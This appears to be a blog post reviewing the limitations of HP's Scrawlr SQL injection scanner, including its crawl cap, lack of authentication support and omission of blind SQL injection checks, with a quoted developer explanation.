HP released a new tool called Scrawlr yesterday that can be used to identify certain types of SQL Injection vulnerabilities in a website. It was a joint effort with Microsoft and a direct response to the mass SQL Injection attacks of late. Scrawlr quickly came under fire on the Web Security mailing list for having some pretty major limitations. Billy Hoffman et al have been quick to point out that the tool was designed to address a very specific subset of SQL Injection vulnerability -- the type affected by the mass attacks -- and is not designed to be a general purpose replacement for existing SQL Injection scanners. Let's look at the limitations, as outlined on the HP page, one by one. Limitation: Will only crawl up to 1500 pages Depends on what they mean by 1500 pages. For example, if I have these links on my front page, is that one URL or three?
Or, does it mean that it will really only crawl 1500 pages total, so if I have the same link 1500 times on the front page, it won't go any further? Either way, for most smaller websites this is probably fine. If you need more than 1500 you could give it different starting URLs in an attempt to improve coverage. It would be nice to have a clearer definition of what it means to "crawl up to 1500 pages" though. Limitation: Does not support sites requiring authentication Well, this will render it useless for the majority of enterprise apps. But there are still a lot of sites out there that don't require authentication, including some of the ones that got hit during the mass attacks, such as the United Nations, UK government, etc. [Update 06/26: Thomas Ptacek Mike Tracy investigates further and provides a workaround that'll work for the majority of sites that use cookie-based auth] Limitation: Does not perform Blind SQL injection They have taken a lot of flack for this but Billy describes it as a conscious choice:
An early version of the tool checked for blind SQL injection, but the final verison of Scrawlr did not. ... The biggest feedback we got from early testing was developers wanted to "see" the vulnerability. Differential analysis is kind of difficult to visualize in a way that is helpful for the average dev, and pulling the table names through blind was too much of a performance issue.